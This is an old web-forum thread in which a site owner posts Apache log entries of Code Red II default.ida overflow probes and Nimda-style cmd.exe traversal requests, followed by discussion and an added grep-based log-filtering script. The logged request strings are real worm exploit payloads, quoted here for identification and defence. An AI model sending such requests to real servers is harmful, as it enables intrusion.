Looking through my log files to help someone a little while ago, I noticed:
12.218.208.223 - - [02/May/2003:21:23:52 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 268
and
12.218.221.166 - - [02/May/2003:21:32:54 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 268

Both are exactly the same URL, and to default.ida. If I remember correctly, default.ida is what the Code Red II attacked, and with a request string similar to that.

I'm on Windows XP with an Apache 1.3.27 server. Any idea on what to do to stop it?

    Yeah, that looks like a Code Red attack to me: only IIS servers with indexing service turned on are vulnerable to it - Apache just goes "Huh".

    As for stopping it, I guess you could block the offending IPs at the firewall... but that could end up being a pretty broad mask.

      Today, I find this lovely block:
      12.224.192.202 - - [03/May/2003:00:58:43 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 273
      12.224.192.202 - - [03/May/2003:00:58:44 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 271
      12.224.192.202 - - [03/May/2003:00:58:44 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
      12.224.192.202 - - [03/May/2003:00:58:44 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
      12.224.192.202 - - [03/May/2003:00:58:45 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
      12.224.192.202 - - [03/May/2003:00:58:46 -0500] "GET /vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
      12.224.192.202 - - [03/May/2003:00:58:47 -0500] "GET /mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
      12.224.192.202 - - [03/May/2003:00:58:47 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
      12.224.192.202 - - [03/May/2003:00:58:47 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
      12.224.192.202 - - [03/May/2003:00:58:48 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
      12.224.192.202 - - [03/May/2003:00:58:48 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
      12.224.192.202 - - [03/May/2003:00:58:49 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
      12.224.192.202 - - [03/May/2003:00:58:49 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
      12.224.192.202 - - [03/May/2003:00:58:50 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
      12.224.192.202 - - [03/May/2003:00:58:50 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
      12.224.192.202 - - [03/May/2003:00:58:50 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
      203.241.248.20 - - [03/May/2003:01:20:27 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
      12.232.200.217 - - [03/May/2003:02:06:17 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 268
      195.199.67.125 - - [03/May/2003:04:36:27 -0500] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

      As you notice, most of them are from the same IP. Any clue as to why I'd be attacked? Or by multiple people?

        There's a chance that someone else's system has been perverted, and used to launch attacks. The attack itself is probably random - scan a block of IPs, see which ones are responding how, and then fire a whole batch of possible exploits at it.

        If it does get to be a hassle I guess you could contact abuse@att.net with your logs, since AT&T covers the 12.xxx.xxx.xxx range and ask them to track down 12.224.192.202. Of course, that doesn't really narrow things down that much (we're talking a major carrier here), so I guess that if you're not actually being damaged by such attacks, your complaint will be prioritised below those who are.

          195.199.67.125

          inetnum: 195.199.67.64 - 195.199.67.127
          netname: SULI-707
          descr: 'Ganz Abraham' Technical Secondary School
          descr: Zalaegerszeg
          country: HU
          admin-c: IT820-RIPE
          tech-c: MP9905-RIPE
          status: ASSIGNED PA
          mnt-by: RIPE-NCC-NONE-MNT
          changed: hostmaster@elender.hu 20000419
          source: RIPE

          School h4x0rz hehe

            Originally posted by Mordecai
            Today, I find this lovely block:

            <SNIP>

            As you notice, most of them are from the same IP. Any clue as to why I'd be attacked? Or by multiple people?

            Idiocy.

            These people sit on Windows 2000 boxes that they bought for home use prior to Nimda/Code Red, most likely. Probably on a cable modem. In Arkansas. Without any virus protection. No patches. Never been to Windowsupdate. Et C...

            Makes me sick :rolleyes:

              Yeah. My parents had 9 viruses when I forced them to install PC-cillin a couple of weeks ago after they called me to reinstall Windows... 9 freaking viruses.

              no firewall, no anti-virus (still)...

                There was one IP which I reported (none of these, it appears the one I reported was manual) to the ISP and to the person it was meant to attack. It was an attempt at connecting to an SMTP server.

                  Likely ye olde

                  CONNECT maila.microsoft.com:25

                  which is now oft substituted with some open relays in Russia or someplace?

                  I have to admit, I've gotten tired of reading this @#$@# and don't even read the other log entries much anymore. Anybody got a good tool, or scheme, for dealing with Apache logs?

                    Originally posted by Mordecai
                    /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

                    This is a Unicode exploit, used to get into a web server. Mostly used by "hackers", with the goal of starting an FTP server.

                    Keep an eye on the folder c:\inetpub\scripts\
                    When someone has successfully entered your server, you will probably find a copy of "cmd.exe" there.

                      Originally posted by Mordecai
                      GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 268

                      This one looks like a WebDAV Unicode attack; someone is trying to enter your web server. No real harm can be done to your system, he/she probably only wants to abuse your bandwidth, but be careful: when they succeed in entering and starting the FTP service (Serv-U FTP Server), they can use your system to scan other ranges.

                      But I think they won't come that far as to start the service.

                        I can guarantee they won't make it in using any means like that. Not only am I not on IIS (rendering Code Red useless), I have a few security measures which might stop them.

                        The only thing I worry about is how much bandwidth it'll use if they keep coming.

                          If you're already to the point of annoying your ISP with your usage, maybe. And you might be...you seem to have a good proj or two available.

                          Otherwise, a few HTTP requests more/less probably aren't making much of a difference. I'm of the opinion that lots of these are dumb bots/infected boxen. I guess if it's scrIp+ kldD33Z who're using automated scanners and they think that your Class A has more interest than some others, these should be on the decrease. Seems to me I saw more of it last year than I am now.

                            Hard to believe, but that damn Code Red is still around. I recently got a new web server for development purposes, and the only hits on it other than from me are from that damned worm.

                            Luckily, I'm on Linux/Apache. Code Red can go you-know-what itself. It's just a nuisance when I need to check the error log. I need to write a script to filter that stuff out.

                            • keith

                              Originally posted by keith73
                              Hard to believe, but that damn Code Red is still around. I recently got a new web server for development purposes, and the only hits on it other than from me are from that damned worm.

                              Luckily, I'm on Linux/Apache. Code Red can go you-know-what itself. It's just a nuisance when I need to check the error log. I need to write a script to filter that stuff out.

                              • keith

                              Would you share/sell it when you get it done...I've been too lazy or too busy....?

                                Originally posted by dalecosp
                                Would you share/sell it when you get it done...I've been too lazy or too busy....?

                                I'd gladly share it, but now that you've asked, there's that much more pressure on me to do one. D'OH.

                                I usually have a script in a protected area of the site that will just read the last few lines of the error log, for when I'm debugging stuff. I wasn't talking about a log parser or anything.

                                Could just write one that reads in the error log and removes all code red lines, but saves the rest back to the file.

                                what does everyone else think?

                                • keith

                                  Just run something that goes through each line and checks if it contains at least one of three things: root.exe, cmd.exe, default.ida

                                  If any of these exist, erase that line.

                                  At the end, loop through the array, and, if the line is not blank, write it to the file.

                                  Seems pretty simple.

                                    The problems are, IMHO: the size of the array needed <? could be wrong about that ?> and the fact that the logdirs are often not accessible to the web user (and I don't want them to be.)

                                    Maybe I could do something with the PHP binary and add it to root's crontab.....

                                      No, no, you don't want to share the log dirs. You could manually run it through every couple of days (or crontab it), though.
                                      Yes, the size would matter a lot. PHP by default can only use 8MB of memory per script, which means a very large log file will kill the script, and probably time out (PHP by default times out after 30 seconds).

                                      If you rotate your logs (rename for every day), it'll work better, but not if you have a LOT of traffic (8MB+ every day in lines).

                                        Yah, those are my concerns as well, although the php CLI max_execution (CLI >= 4.3.0) is limitless. I thought it might be interesting to try this idea; I got a little stuck when I found that the PHP binary I keep lying around (the webserver has the Apache module instead) was still 4.1.1 ...

                                        I built again last night, but the version that installed was the CGI, so I've gotta go back in and install the CLI instead.

                                        I figured now that I'm getting pretty good at PHP, shell scripting with it would be easy. But, it seems I'm gonna have to break down and read about that, too...and just when "C for dummies" was getting interesting 😉

                                        If I tried long enough, I could probably write a C shell script (dangerous tho' it may be) that would pipe the log through grep(1) and write to a separate file, or something. I was just hoping that with PHP it'd be a 15-minute hack.... 🆒
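The filter that several posts above sketch (drop any line containing root.exe, cmd.exe or default.ida; worry about PHP's 8MB memory limit and 30-second timeout on a big log; or just pipe the log through grep(1) into a separate file) fits in a few lines of POSIX shell. The block below is an added example and is not code from anyone in this thread. It streams the log with grep, so nothing is held in an array and the log size does not matter, writes the readable lines and the worm probes to two separate files instead of rewriting the log in place, and tallies the probes per source address. The sample log is constructed for the demo (addresses from the 192.0.2.0/24 documentation range), and the file paths under `$TMPDIR` are assumptions; point `SAMPLE_LOG` at your own access log to use it for real.

```shell
#!/bin/sh
# Added example, not code from anyone in this thread: a streaming log filter
# built on grep(1). The whole log never sits in memory, so the 8MB PHP
# memory_limit and the 30-second timeout mentioned above do not come into
# play, and the output goes to a separate file rather than back over the log.
# The three strings are the ones named in the thread; extend WORM_PATTERN
# with further probe signatures as they turn up in your own logs.

WORM_PATTERN='default\.ida|cmd\.exe|root\.exe'

# filter_worm_noise SRC KEEP NOISE
# One pass writes the lines worth reading to KEEP, a second pass writes the
# worm probes to NOISE (useful for an abuse report or a per-IP count).
# grep exits 1 when it matched nothing, which is not an error here; any
# other non-zero status (unreadable file, bad pattern) makes us return 2.
filter_worm_noise() {
    src="$1"; keep="$2"; noise="$3"
    grep -E -v "$WORM_PATTERN" "$src" > "$keep"  || [ $? -eq 1 ] || return 2
    grep -E    "$WORM_PATTERN" "$src" > "$noise" || [ $? -eq 1 ] || return 2
}

# count_worm_hits SRC -> prints the number of worm probe lines in SRC
count_worm_hits() {
    grep -E -c "$WORM_PATTERN" "$1" || [ $? -eq 1 ]
}

# worm_sources NOISE -> "count ip" per source address, busiest first,
# which answers "most of them are from the same IP" at a glance.
worm_sources() {
    awk '{ print $1 }' "$1" | sort | uniq -c | sort -rn
}

# --- constructed sample log (not real traffic; 192.0.2.0/24 is documentation space) ---
DEMO_DIR="${TMPDIR:-/tmp}/worm_filter_demo.$$"   # assumed scratch location
mkdir -p "$DEMO_DIR"
SAMPLE_LOG="$DEMO_DIR/access.log"
KEEP_LOG="$DEMO_DIR/access.clean.log"
NOISE_LOG="$DEMO_DIR/access.worms.log"

cat > "$SAMPLE_LOG" <<'EOF'
192.0.2.10 - - [03/May/2003:00:58:43 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 273
192.0.2.10 - - [03/May/2003:00:58:44 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
192.0.2.20 - - [03/May/2003:02:06:17 -0500] "GET /default.ida?XXXXXXXX%u9090%u6858=a HTTP/1.0" 404 268
192.0.2.30 - - [03/May/2003:09:15:02 -0500] "GET /index.html HTTP/1.1" 200 1043
192.0.2.30 - - [03/May/2003:09:15:03 -0500] "GET /style.css HTTP/1.1" 200 512
EOF

filter_worm_noise "$SAMPLE_LOG" "$KEEP_LOG" "$NOISE_LOG"
echo "worm probes: $(count_worm_hits "$SAMPLE_LOG")  (kept $(wc -l < "$KEEP_LOG" | tr -d ' ') real lines in $KEEP_LOG)"
echo "probes by source:"
worm_sources "$NOISE_LOG"
```

Run it from cron against the rotated log of the previous day and the noise file doubles as the evidence to attach to an abuse report; because the script only reads the log and writes elsewhere, it needs no write access to the log directory and no web-user access to it at all.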